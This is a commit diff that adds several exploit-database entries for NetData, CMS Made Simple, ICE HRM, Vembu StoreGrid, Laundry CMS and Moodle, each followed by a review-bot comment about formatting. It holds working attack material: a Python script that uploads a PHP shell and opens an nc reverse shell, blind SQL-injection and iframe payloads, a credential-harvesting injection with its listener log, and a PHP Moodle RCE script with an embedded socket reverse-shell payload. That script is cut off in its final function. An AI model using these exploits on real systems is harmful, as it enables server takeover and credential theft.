diff --git a/exploits/multiple/webapps/46545.txt b/exploits/multiple/webapps/46545.txt
new file mode 100644
index 000000000..86a91d8d2
--- /dev/null
+++ b/exploits/multiple/webapps/46545.txt
@@ -0,0 +1,49 @@
+# ************************************************************************
+# * Author: Marcelo Vázquez (aka s4vitar) *
+# * NetData v1.13.0 HTML Injection Vulnerability *
+# ************************************************************************
+
+# Exploit Title: NetData v1.13.0 HTML Injection Vulnerability
+# Date: 2019-03-14
+# Exploit Author: Marcelo Vázquez (aka s4vitar)
+# Collaborators: Victor Lasa (aka vowkin)
+# Vendor Homepage: https://my-netdata.io/
+# Software Link: https://docs.netdata.cloud/packaging/installer/
+# Version: <= NetData v1.13.0
+# PoC Video (Credential Harvesting): https://www.youtube.com/watch?v=zSG93yX0B8k
+
+NetData is prone to multiple HTML-injection vulnerabilities.
+
+Successful exploitation will allow attacker-supplied HTML to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+NetData 1.13.0 is vulnerable; other versions may also be affected.
+
+Proof of Concept:
+=====================
+
+1. Export a valid snapshot using the "export/save a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).
+
+2. Once it has finished exporting, attackers can manipulate the contents of said snapshot file and inject their own malicious HTML code. An example is provided below:
+
+
Please login with valid credentials:
Please enter your credentials to see the content:
+
+In this case, the attackers perform a credential theft attack where they specify the public IP and port from their own server, which is listening for new connections in order to receive the stolen credentials in plain text.
+
+3. Import the newly modified snapshot using the "import/load a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).
+
+4. Once imported, the victim will see a login form that asks for their credentials.
+
+5. After they are entered, the attacker can visualize said credentials in plain text on his own server, as they are sent through a simple GET request:
+
+root@vps-server:~# nc -nlvp 4646
+Listening on [0.0.0.0] (family 0, port 4646)
+Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930)
+GET /?username=test&password=passwordexample HTTP/1.1
+Host: XXX.XXX.XX.XX:4646
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost:19999/
+Accept-Encoding: gzip, deflate
+Accept-Language: es-ES,es;q=0.9,en;q=0.8
\ No newline at end of file
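Review bot: The injected-HTML example that L32 announces (`An example is provided below:`) is not in the committed text; L35–L36 hold only the two rendered label strings `Please login with valid credentials:` and `Please enter your credentials to see the content:` without a diff marker, so the markup appears to have been stripped before commit and the PoC cannot be reproduced from the advisory as written. Restore the snippet as escaped text (or a short description of the snapshot field that is rendered unescaped on import, which is what L23 and L42 imply) so the report stands on its own. The version statements also disagree slightly: L18 says `<= NetData v1.13.0` while L25 says only 1.13.0 is confirmed and others "may" be affected; one sentence stating which versions were actually tested would settle it.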
diff --git a/exploits/php/webapps/46546.py b/exploits/php/webapps/46546.py
new file mode 100755
index 000000000..229714169
--- /dev/null
+++ b/exploits/php/webapps/46546.py
@@ -0,0 +1,75 @@
+#!/usr/bin/env python
+# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module
+# Date: March 2019
+# Exploit Author: Daniele Scanu @ Certimeter Group
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2
+# Version: Showtime2 module <= 3.6.2
+# Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04
+# CVE : 2019-9692
+
+import requests
+import optparse
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://192.168.1.10/cms)")
+parser.add_option('-U', '--username', action="store", dest="username", help="Username for login", default="admin")
+parser.add_option('-P', '--password', action="store", dest="password", help="Password for login", default="password")
+parser.add_option('-l', '--local', action="store", dest="local", help="Local uri for reverse shell", default="localhost")
+parser.add_option('-p', '--port', action="store", dest="port", help="Local port for reverse shell", default="2222")
+options, args = parser.parse_args()
+
+if not options.url:
+ print "[-] Specify an uri target"
+ exit()
+
+if not options.username:
+ print "[-] Specify an username for login in administrator panel"
+ exit()
+
+if not options.password:
+ print "[-] Specify a password for login in administrator panel"
+ exit()
+
+base_uri = options.url
+url_login = base_uri + "/admin/login.php"
+user = options.username
+password = options.password
+session = requests.Session()
+__c_var = ""
+lhost = options.local
+lport = options.port
+
+# Login in administrator panel for get the csrf token
+def login(username, password):
+ print "[*] Login to cms"
+ global __c_var
+ credentials = {"username": username, "password": password, "loginsubmit": "Submit"}
+ response = session.post(url_login, data=credentials, allow_redirects=False)
+ __c_var = response.headers['Location'].split("__c=")[1]
+ print "[*] Token value: " + __c_var
+
+# upload a php script with reverse shell in vulnerable functionality
+def upload_shell():
+ print "[*] Uploading webshell"
+ multipart_data = MultipartEncoder(
+ fields = {
+ 'm1_input_browse': ('shell.php', "", 'text/plain'),
+ '__c': __c_var,
+ 'mact': 'Showtime2,m1_,defaultadmin,0',
+ 'm1_upload_submit': 'Upload'
+ }
+ )
+ response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,
+ headers={'Content-Type': multipart_data.content_type})
+
+# Call the script uploaded for spawn a reverse shell
+def spawn_shell():
+ print "[*] Spawn a shell to " + lhost + ":" + str(lport)
+ payload = {"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + lhost + " " + str(lport) + " >/tmp/f"}
+ requests.post(base_uri + "/uploads/images/shell.php", data=payload)
+
+login(user, password)
+upload_shell()
+spawn_shell()
\ No newline at end of file
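Review bot: The header on L73 gives the identifier as `# CVE : 2019-9692`, without the `CVE-` prefix used elsewhere in this commit (46549.txt, L228), which defeats tooling that greps for `CVE-\d+-\d+`; change it to `# CVE : CVE-2019-9692`. The script is Python 2 only (`print` statements on L88, L110, L115, L119, L133 and bare `exit()`), yet the shebang on L65 is the version-agnostic `#!/usr/bin/env python`; `#!/usr/bin/env python2` or a `# Tested on: ... Python 2.7` note in the header would make that explicit. `response` on L128 is assigned and never read, so the assignment can be dropped. The `requests_toolbelt` import on L77 is a third-party dependency that the header does not mention.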
diff --git a/exploits/php/webapps/46548.txt b/exploits/php/webapps/46548.txt
new file mode 100644
index 000000000..bc093b17d
--- /dev/null
+++ b/exploits/php/webapps/46548.txt
@@ -0,0 +1,69 @@
+===========================================================================================
+# Exploit Title: ICE HRM - ’ob’ SQL Inj.
+# Dork: N/A
+# Date: 14-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://icehrm.org
+# Software Link: https://sourceforge.net/projects/icehrm/
+# Version: v23.0
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: ICE Hrm is a Human resource management system for
+small and medium sized organizations.
+ It has a rich UI built with PHP and Java Script.
+===========================================================================================
+# POC - SQLi (blind)
+# Parameters : ob
+# Attack Pattern :
+1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
+# POST Method : http://localhost/icehrmv23OS/app/service.php
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: ICE HRM - ’ob’ SQL Inj.
+# Dork: N/A
+# Date: 14-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://icehrm.org
+# Software Link: https://sourceforge.net/projects/icehrm/
+# Version: v23.0
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: ICE Hrm is a Human resource management system for
+small and medium sized organizations.
+ It has a rich UI built with PHP and Java Script.
+===========================================================================================
+# POC - SQLi (blind)
+# Parameters : ob
+# Attack Pattern :
+1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
+# GET Method :
+http://localhost/icehrmv23OS/app/data.php?t=Employee&sm=%7B%22nationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22supervisor%22:[%22Employee%22,%22id%22,%22first_name%20last_name%22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_name%22,%22last_name%22,%22mobile_phone%22,%22department%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f
+===========================================================================================
+
+===========================================================================================
+# Exploit Title: ICE HRM - ’msg’ Frame Inj.
+# Dork: N/A
+# Date: 14-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://icehrm.org
+# Software Link: https://sourceforge.net/projects/icehrm/
+# Version: v23.0
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: ICE Hrm is a Human resource management system for
+small and medium sized organizations.
+It has a rich UI built with PHP and Java Script.
+===========================================================================================
+# POC - Frame Inj.
+# Parameters : msg
+# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org
+%2f%3f%22%3e%3c%2fiframe%3e
+# GET Method :
+http://localhost/icehrmv23OS/app/fileupload_page.php?id=_id_&msg=&file_group=_file_group_&file_type=_file_type_&user=_user_
+===========================================================================================
\ No newline at end of file
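Review bot: The first two entries (L147–L167 and L169–L190) carry an identical header, the same title `ICE HRM - ’ob’ SQL Inj.` and the same attack pattern; only the request method and endpoint differ, so the second header should either be dropped or its title distinguished, e.g. `# Exploit Title: ICE HRM - ’ob’ SQL Inj. (GET data.php)`. The titles on L148, L170 and L193 use the typographic quote `’` on both sides of the parameter name; plain ASCII `'ob'` / `'msg'` avoids encoding surprises in tools that index this repository. The pattern on L209–L210 is split across two lines in the middle of the URL, which looks like mail wrapping rather than intent and should be rejoined.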
diff --git a/exploits/php/webapps/46549.txt b/exploits/php/webapps/46549.txt
new file mode 100644
index 000000000..cf86bd6f2
--- /dev/null
+++ b/exploits/php/webapps/46549.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
+# Discovery Date: 2018-12-05
+# Exploit Author: Gionathan "John" Reale
+# Vendor Homepage: https://www.vembu.com/
+# Software Link : N/A
+# Google Dork: N/A
+# Version: 4.4.0
+# CVE : CVE-2014-10078,CVE-2014-10079
+Description StoreGrid enables you to offer an automated online backup service to your customers and is designed to be flexible to your needs. Upon investigating the web interface I discovered multiple vulnerabilities.
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+Information Disclosure. The front page of the server web interface leaks the private IP address in the hidden form "ipaddress" around line 80.
+==========================================================================================================================
+Reflected XSS. The server web interface contains multiple reflected XSS exploits that do not require authentication.
+https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=&result=
+https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=&result=
+https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=&result=
+https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=
+https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=
+https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfailure.php?cn=gar&result=
+=============================================================================================================================
+Self XSS. The server web interface contains a self XSS in the search function.
+==============================================================================================================================
\ No newline at end of file
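Review bot: The six reflected-XSS URLs on L234–L239 all end in an empty `result=` parameter and L234 duplicates L236 exactly, so the advisory names the endpoints but no longer shows which parameter is reflected; L233 should at least state whether `cn`, `result` or both are echoed unencoded. `Description StoreGrid enables ...` on L229 is missing a colon after `Description`, and `# Software Link : N/A` on L225 has a stray space before the colon, unlike the other header lines. L221 says "Multiple Vulnerabilities" and L228 lists two CVEs, while the body describes three findings (information disclosure, reflected XSS, self XSS); a line mapping each CVE to its finding would remove the ambiguity.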
diff --git a/exploits/php/webapps/46550.txt b/exploits/php/webapps/46550.txt
new file mode 100644
index 000000000..2342a1e13
--- /dev/null
+++ b/exploits/php/webapps/46550.txt
@@ -0,0 +1,126 @@
+===========================================================================================
+# Exploit Title: Laundry CMS cloth_code SQL Inj.
+# Dork: N/A
+# Date: 09-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://laundry.rpcits.co.in/
+# Software Link: https://sourceforge.net/projects/laundry/
+# Version: New
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: The Laundry Management Application is a very
+simple and Online Services
+ with mobile and computer friendly themes development.
+===========================================================================================
+# POC - SQLi
+# Parameters : cloth_code, cloth_name
+# Attack Pattern : %2527
+# POST Method : http://localhost/laundry/index.php/admin/cloth_crud/create
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: Laundry CMS Multiple SQL Inj.
+# Dork: N/A
+# Date: 09-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://laundry.rpcits.co.in/
+# Software Link: https://sourceforge.net/projects/laundry/
+# Version: New
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: The Laundry Management Application is a very
+simple and Online Services
+ with mobile and computer friendly themes development.
+===========================================================================================
+# POC - SQLi
+# Parameters : last_name, password, email, phone, first_name, status,
+join_date, address,
+# Attack Pattern : %2527
+# POST Method : http://localhost/laundry/index.php/admin/customer_crud/create
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: Laundry CMS Multiple SQL Inj.
+# Dork: N/A
+# Date: 09-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://laundry.rpcits.co.in/
+# Software Link: https://sourceforge.net/projects/laundry/
+# Version: New
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: The Laundry Management Application is a very
+simple and Online Services
+ with mobile and computer friendly themes development.
+===========================================================================================
+# POC - SQLi
+# Parameters : last_name, password, email, phone, first_name, status,
+join_date, address, gender
+# Attack Pattern : %2527
+# POST Method : http://localhost/laundry/index.php/admin/employee_crud/new
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: Laundry CMS expse_code SQL Inj.
+# Dork: N/A
+# Date: 09-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://laundry.rpcits.co.in/
+# Software Link: https://sourceforge.net/projects/laundry/
+# Version: New
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: The Laundry Management Application is a very
+simple and Online Services
+ with mobile and computer friendly themes development.
+===========================================================================================
+# POC - SQLi
+# Parameters : expse_code, expse_type, expse_id
+# Attack Pattern : %2527
+# POST Method : http://localhost/laundry/index.php/admin/expenses_crud/create
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: Laundry CMS service_code SQL Inj.
+# Dork: N/A
+# Date: 09-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://laundry.rpcits.co.in/
+# Software Link: https://sourceforge.net/projects/laundry/
+# Version: New
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: The Laundry Management Application is a very
+simple and Online Services
+ with mobile and computer friendly themes development.
+===========================================================================================
+# POC - SQLi
+# Parameters : service_code, service_name
+# Attack Pattern : %2527
+# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
+===========================================================================================
+
+===========================================================================================
+# Exploit Title: Laundry CMS Multiple Frame Inj.
+# Dork: N/A
+# Date: 09-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: http://laundry.rpcits.co.in/
+# Software Link: https://sourceforge.net/projects/laundry/
+# Version: New
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: The Laundry Management Application is a very simple and Online Services
+ with mobile and computer friendly themes development.
+===========================================================================================
+# POC - Frame Inj.
+# Parameters : cloth_name, service_name, expse_type
+# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e
+# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
+===========================================================================================
\ No newline at end of file
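Review bot: The last entry's `# POST Method` on L374 names only `service_crud/create`, while its parameter list on L372 (`cloth_name, service_name, expse_type`) spans the three endpoints given separately on L268, L333 and L354; list all three endpoints or split the entry, otherwise the `cloth_name` and `expse_type` cases cannot be reproduced from the text. The second and third entries (L271–L291, L293–L313) share the title `Laundry CMS Multiple SQL Inj.` and differ only in endpoint and the added `gender` parameter; a suffix such as `(customer_crud)` / `(employee_crud)` would distinguish them. `# Version: New` on L257 (repeated in every block) is not a version; the release date or tag from the software link belongs there.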
diff --git a/exploits/php/webapps/46551.php b/exploits/php/webapps/46551.php
new file mode 100644
index 000000000..0fd18bf6f
--- /dev/null
+++ b/exploits/php/webapps/46551.php
@@ -0,0 +1,512 @@
+ php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
+ *
+ * user The account username
+ * pass The password to the account
+ * ip Callback IP
+ * port Callback Port
+ * course Valid course ID belonging to the teacher
+ *
+ * Make sure you're running a netcat listener on the specified port before
+ * executing this script.
+ *
+ * > nc -lnvp 1010
+ *
+ * This will attempt to open up a reverse shell to the listening IP and port.
+ *
+ * You can start the script with `debug=true` to enable debug mode.
+ */
+namespace exploit {
+ class moodle {
+ public $ip;
+ public $port;
+ public $courseId;
+
+ public $cookie_jar;
+ public $url;
+ public $pass;
+ public $payload;
+ public $quizId = false;
+
+ public $moodleSession = false;
+ public $moodleKey;
+
+ // Verification patterns
+ public $loginSuccessMatch = "/course.view\.php/";
+ public $courseSuccessMatch = "/.\/i.Edit.settings.\/a./";
+ public $editSuccessMatch = "/.view.php\?id=2¬ifyeditingon=1/";
+ public $quizSuccessMatch = "/.title.Editing.Quiz.\/title./";
+ public $quizConfigMatch = "/title.*xxxx.\/title./";
+ public $evilSuccess = "/The\ wild\ cards\ \\{x..\}\<\/strong\>\ will\ be\ substituted/";
+
+ public $debug;
+
+ public function __construct($url, $user, $pass, $ip, $port, $course, $debug) {
+ $this->cookie_jar = tempnam("/tmp","cookie");
+ $this->url = $url;
+ $this->pass = $pass;
+ $this->ip = $ip;
+ $this->port = $port;
+ $this->courseId = $course;
+ $this->debug = $debug;
+
+ // Inject a reverse shell
+ // You could modify this payload to inject whatever you like
+ $this->payload = "(python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"".$this->ip."\",".$this->port."))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b')";
+
+ echo("\n\r");
+ echo("*------------------------------*\n\r");
+ echo("* Noodle [Moodle RCE] (v3.4.1) *\n\r");
+ echo("*------------------------------*\n\r");
+ echo("\n\r");
+ echo("[!] Make sure you have a listener\n\r");
+ echo(sprintf("[!] at %s:%s\n\r", $this->ip, $this->port));
+ echo("\n\r");
+
+ $this->login($url, $user, $pass);
+ $this->loadCourse($this->courseId);
+ $this->enableEdit();
+ $this->addQuiz();
+ $this->editQuiz();
+ $this->addCalculatedQuestion();
+ $this->addEvilQuestion();
+ $this->exploit();
+ echo "[*] DONE\n\r";
+ die();
+ }
+
+ function login($url, $user, $pass) {
+ echo(sprintf("[*] Logging in as user %s with password %s \n\r", $user, $pass));
+
+ $data = [
+ "anchor" => "",
+ "username" => $user,
+ "password" => $pass
+ ];
+
+ $result = $this->httpPost("/login/index.php", $data);
+
+ if (!preg_match($this->loginSuccessMatch, $result["body"])) {
+ echo "[-] LOGIN FAILED!\n\r";
+ echo "[?] Do you have the right credentials and url?\n\r";
+ die();
+ }
+
+ $matches = [];
+ $cookies = preg_match_all("/MoodleSession=(.*); path=/", $result["header"], $matches);
+
+ $this->moodleSession = $matches[1][1];
+
+ $matches = [];
+ $key = preg_match_all("/sesskey\":\"(.*)\",\"themerev/", $result["body"], $matches);
+
+ $this->moodleKey = $matches[1][0];
+
+ echo "[+] Successful Login\n\r";
+ echo sprintf("[>] Moodle Session %s \n\r", $this->moodleSession);
+ echo sprintf("[>] Moodle Key %s \n\r", $this->moodleKey);
+ }
+
+ function loadCourse($id) {
+ echo(sprintf("[*] Loading Course ID %s \n\r", $id));
+ $result = $this->httpGet(sprintf("/course/view.php?id=%s", $id), $this->moodleSession);
+
+ if (!preg_match($this->courseSuccessMatch, $result["body"])) {
+ echo "[-] LOADING COURSE FAILED!\n\r";
+ echo "[?] Does the course exist and belong to the teacher?\n\r";
+ die();
+ }
+
+ echo "[+] Successfully Loaded Course\n\r";
+ }
+
+ function enableEdit() {
+ echo(sprintf("[*] Enable Editing\n\r"));
+ $result = $this->httpGet(sprintf(
+ "/course/view.php?id=%s&sesskey=%s&edit=on",
+ $this->courseId,
+ $this->moodleKey
+ ), $this->moodleSession);
+
+ if (!preg_match($this->editSuccessMatch, $result["header"])) {
+ echo "[-] ENABLE EDITING FAILED!\n\r";
+ echo "[?] Does the user have the teacher role?\n\r";
+ die();
+ }
+
+ echo "[+] Successfully Enabled Course Editing\n\r";
+ }
+
+ function addQuiz() {
+ echo(sprintf("[*] Adding Quiz\n\r"));
+
+ $data = [
+ "course" => $this->courseId,
+ "sesskey" => $this->moodleKey,
+ "jump" => urlencode(sprintf(
+ "/course/mod.php?id=%s&sesskey=%s&str=0&add=quiz§ion=0",
+ $this->courseId,
+ $this->moodleKey
+ )),
+ ];
+
+ $result = $this->httpPost("/course/jumpto.php", $data, $this->moodleSession);
+
+ if (!preg_match($this->quizSuccessMatch, $result["body"])) {
+ echo "[-] ADD QUIZ FAILED!\n\r";
+ die();
+ }
+
+ echo "[+] Successfully Added Quiz\n\r";
+ echo "[*] Configuring New Quiz\n\r";
+
+ $submit = [
+ "grade" => 10,
+ "boundary_repeats" => 1,
+ "completionunlocked" => 1,
+ "course" => $this->courseId,
+ "coursemodule" => "",
+ "section" => 0,
+ "module" => 16,
+ "modulename" => "quiz",
+ "instance" => "",
+ "add" => "quiz",
+ "update" => 0,
+ "return" => 0,
+ "sr" => 0,
+ "sesskey" => $this->moodleKey,
+ "_qf__mod_quiz_mod_form" => 1,
+ "mform_showmore_id_layouthdr" => 0,
+ "mform_showmore_id_interactionhdr" => 0,
+ "mform_showmore_id_display" => 0,
+ "mform_showmore_id_security" => 0,
+ "mform_isexpanded_id_general" => 1,
+ "mform_isexpanded_id_timing" => 0,
+ "mform_isexpanded_id_modstandardgrade" => 0,
+ "mform_isexpanded_id_layouthdr" => 0,
+ "mform_isexpanded_id_interactionhdr" => 0,
+ "mform_isexpanded_id_reviewoptionshdr" => 0,
+ "mform_isexpanded_id_display" => 0,
+ "mform_isexpanded_id_security" => 0,
+ "mform_isexpanded_id_overallfeedbackhdr" => 0,
+ "mform_isexpanded_id_modstandardelshdr" => 0,
+ "mform_isexpanded_id_availabilityconditionsheader" => 0,
+ "mform_isexpanded_id_activitycompletionheader" => 0,
+ "mform_isexpanded_id_tagshdr" => 0,
+ "mform_isexpanded_id_competenciessection" => 0,
+ "name" => "xxxx",
+ "introeditor[text]" => "xxxx
",
+ "introeditor[format]" => 1,
+ "introeditor[itemid]" => 966459952,
+ "showdescription" => 0,
+ "overduehandling" => "autosubmit",
+ "gradecat" => 1,
+ "gradepass" => "",
+ "attempts" => 0,
+ "grademethod" => 1,
+ "questionsperpage" => 1,
+ "navmethod" => "free",
+ "shuffleanswers" => 1,
+ "preferredbehaviour" => "deferredfeedback",
+ "attemptonlast" => 0,
+ "attemptimmediately" => 1,
+ "correctnessimmediately" => 1,
+ "marksimmediately" => 1,
+ "specificfeedbackimmediately" => 1,
+ "generalfeedbackimmediately" => 1,
+ "rightanswerimmediately" => 1,
+ "overallfeedbackimmediately" => 1,
+ "attemptopen" => 1,
+ "correctnessopen" => 1,
+ "marksopen" => 1,
+ "specificfeedbackopen" => 1,
+ "generalfeedbackopen" => 1,
+ "rightansweropen" => 1,
+ "overallfeedbackopen" => 1,
+ "showuserpicture" => 0,
+ "decimalpoints" => 2,
+ "questiondecimalpoints" => -1,
+ "showblocks" => 0,
+ "quizpassword" => "",
+ "subnet" => "",
+ "browsersecurity" => "-",
+ "feedbacktext[0][text]" => "",
+ "feedbacktext[0][format]" => 1,
+ "feedbacktext[0][itemid]" => 754687559,
+ "feedbackboundaries[0]" => "",
+ "feedbacktext[1][text]" => "",
+ "feedbacktext[1][format]" => 1,
+ "feedbacktext[1][itemid]" => 88204176,
+ "visible" => 1,
+ "cmidnumber" => "",
+ "groupmode" => 0,
+ "availabilityconditionsjson" => urlencode("{\"op\":\"&\",\"c\":[],\"showc\":[]}"),
+ "completion" => 1,
+ "tags" => "_qf__force_multiselect_submission",
+ "competency_rule" => 0,
+ "submitbutton" => "Save and display"
+ ];
+
+ $result = $this->httpPost("/course/modedit.php", $submit, $this->moodleSession);
+
+ if (!preg_match($this->quizConfigMatch, $result["body"])) {
+ echo "[-] CONFIGURE QUIZ FAILED!\n\r";
+ die();
+ }
+
+ $matches = [];
+ $quiz = preg_match_all("/quiz\/view.php.id=(.*)&forceview=1/", $result["header"], $matches);
+
+ $this->quizId = $matches[1][0];
+
+ echo "[+] Successfully Configured Quiz\n\r";
+ }
+
+ function editQuiz() {
+ echo(sprintf("[*] Loading Edit Quiz Page \n\r"));
+ $result = $this->httpGet(sprintf("/mod/quiz/edit.php?cmid=%s", $this->quizId), $this->moodleSession);
+
+ if (!preg_match("/.title.Editing quiz: xxxx.\/title/", $result["body"])) {
+ echo "[-] LOADING EDITING PAGE FAILED!\n\r";
+ die();
+ }
+
+ echo "[+] Successfully Loaded Edit Quiz Page\n\r";
+ }
+
+ function addCalculatedQuestion() {
+ echo(sprintf("[*] Adding Calculated Question \n\r"));
+
+ $endpoint = "/question/question.php?courseid=".$this->courseId."&sesskey=".$this->moodleKey."&qtype=calculated&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D".$this->quizId."%26addonpage%3D0&cmid=".$this->quizId."&category=2&addonpage=0&appendqnumstring=addquestion'";
+
+ $result = $this->httpGet($endpoint, $this->moodleSession);
+
+ if (!preg_match("/title.Editing\ a\ Calculated\ question.\/title/", $result["body"])) {
+ echo "[-] ADDING CALCULATED QUESTION FAILED!\n\r";
+ die();
+ }
+
+ echo "[+] Successfully Added Calculation Question\n\r";
+ }
+
+ function addEvilQuestion() {
+ echo(sprintf("[*] Adding Evil Question \n\r"));
+
+ $payload = [
+ "initialcategory" => 1,
+ "reload" => 1,
+ "shuffleanswers" => 1,
+ "answernumbering" => "abc",
+ "mform_isexpanded_id_answerhdr" => 1,
+ "noanswers" => 1,
+ "nounits" => 1,
+ "numhints" => 2,
+ "synchronize" => "",
+ "wizard" => "datasetdefinitions",
+ "id" => "",
+ "inpopup" => 0,
+ "cmid" => $this->quizId,
+ "courseid" => 2,
+ "returnurl" => sprintf("/mod/quiz/edit.php?cmid=%s&addonpage=0", $this->quizId),
+ "scrollpos" => 0,
+ "appendqnumstring" => "addquestion",
+ "qtype" => "calculated",
+ "makecopy" => 0,
+ "sesskey" => $this->moodleKey,
+ "_qf__qtype_calculated_edit_form" => 1,
+ "mform_isexpanded_id_generalheader" => 1,
+ "mform_isexpanded_id_unithandling" => 0,
+ "mform_isexpanded_id_unithdr" => 0,
+ "mform_isexpanded_id_multitriesheader" => 0,
+ "mform_isexpanded_id_tagsheader" => 0,
+ "category" => "2,23",
+ "name" => "zzzz",
+ "questiontext[text]" => "zzzz
",
+ "questiontext[format]" => 1,
+ "questiontext[itemid]" => 999787569,
+ "defaultmark" => 1,
+ "generalfeedback[text]" => "",
+ "generalfeedback[format]" => 1,
+ "generalfeedback[itemid]" => 729029157,
+ "answer[0]" => ' /*{a*/`$_GET[0]`;//{x}}',
+ "fraction[0]" => "1.0",
+ "tolerance[0]" => "0.01",
+ "tolerancetype[0]" => 1,
+ "correctanswerlength[0]" => 2,
+ "correctanswerformat[0]" => 1,
+ "feedback[0][text]" => "",
+ "feedback[0][format]" => 1,
+ "feedback[0][itemid]" => 928615051,
+ "unitrole" => 3,
+ "penalty" => "0.3333333",
+ "hint[0]text]" => "",
+ "hint[0]format]" => 1,
+ "hint[0]itemid]" => 236679070,
+ "hint[1]text]" => "",
+ "hint[1]format]" => 1,
+ "hint[1]itemid]" => 272691514,
+ "tags" => "_qf__force_multiselect_submission",
+ "submitbutton" => "Save change"
+ ];
+
+ $result = $this->httpPost("/question/question.php", $payload, $this->moodleSession);
+
+ if (!preg_match($this->evilSuccess, $result["body"])) {
+ echo "[-] EVIL QUESTION CREATION FAILED!\n\r";
+ die();
+ }
+
+ echo "[+] Successfully Created Evil Question\n\r";
+ }
+
+ function exploit() {
+ echo "[*] Sending Exploit\n\r";
